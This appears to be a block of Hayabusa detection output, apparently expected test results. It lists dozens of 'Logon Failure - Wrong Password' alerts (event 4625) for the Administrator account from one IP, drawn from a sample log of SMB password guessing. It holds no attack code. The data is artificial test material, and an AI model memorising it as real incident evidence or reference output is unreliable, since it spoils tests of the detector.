+2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t88CBspQqbiO1IPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zELW2Upo3jRCIqJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfcyJGLYmu93JBIL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3t2nKPZHZvcXM3QA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oiDRonqdEM2YJvz9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wJPF4GUypkDkTz56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cd5YRVIoXx8LoYpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H49I2Xp2Gz1Jj0Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMSWWzskoRfYBGny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLm2PolKMBsYkPnN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZjHWhG2rXzYWskz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FOZzVedHYODB5Yvd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVaRybjI4HdZV0Zs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tTcl30MvvycjFcQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVZqbCr9EwmV4gNE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zVwhii0TVmCkpDI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Tx04CPPVa6WYY9G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gHyefIGqhIIy3ZI9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wrietoh4wgXcEvNd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9WW0Y5PW2JfCCdyR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmXsMJ0ELK4qiNY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeftUqriSoxCgmDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60JE9WQQ8N00j65B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0rt2yVAEH6V4IIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pay98C2Gr1di7qQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8TyPDYm9QCAmqj7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Dw3iK7DQMVXy8LW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BMuO0QEkxpKRv4Vl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaHECaQDXCXQc9Xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ewXT2VcARiaNLIxJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGSTrm4AOojs7So0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wVTBSk0Q65LkaTqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NjFN51w3T4VwuWa5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KG7a88h48ZEyOuYw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ksKuTSGukc5em3B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPEMcGV6ZR92sWNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iBQ6sKrRjb7BsySN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gDFnG1gv7jOeIQ0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdFKkcNpkfAScnkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IAYbV4ioewwkZSmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bQ2Dxd6nlgSXJpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: havLyoVCfdCqzrqO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b2vZLhz19pXrq9iE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4TSN93DrSWb1ah4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QwFyrxiceLRTD9rI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARbqo84Mr5T3ltRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34HpQJO17IDWber9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bSSbqOtdSeH58oIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EMvTo7fU6J468WE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8gzx6Vr9LoInM1df | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwXC2S4HwdwNE6SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pQa1WxSt3bj9LEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fm65jq9tRQznmWPh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd8BJbXvEoaDADLc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P0JlFw7S6jFUt4Iy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rfMbFXQcP5sA2wmf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xu4pgyCcDjl9h0Et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B00w8dZG3sT2Lsqo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aKGq6qrchp4SLvT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnScYHBCKOSHItsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r8UMBM326M7a4njd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kTdYWOi6p7etRfya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JWSlcEVzj5lGtVg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xc77wukLTPOYAzj2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4WmTwTGuwDN6YXn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeN4cSffFA04oOje | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eYFPV1kGALqX8jyO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIlhxT4qqo5bCsU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: btoOskH0112h7MTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWUhQJBcS7XbMJUq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E70qmXDDWqmWJjyU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oX0L8wf6nt2grLvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0D8BwniiXsjfkYqE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSWYo4mphuvKHQHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
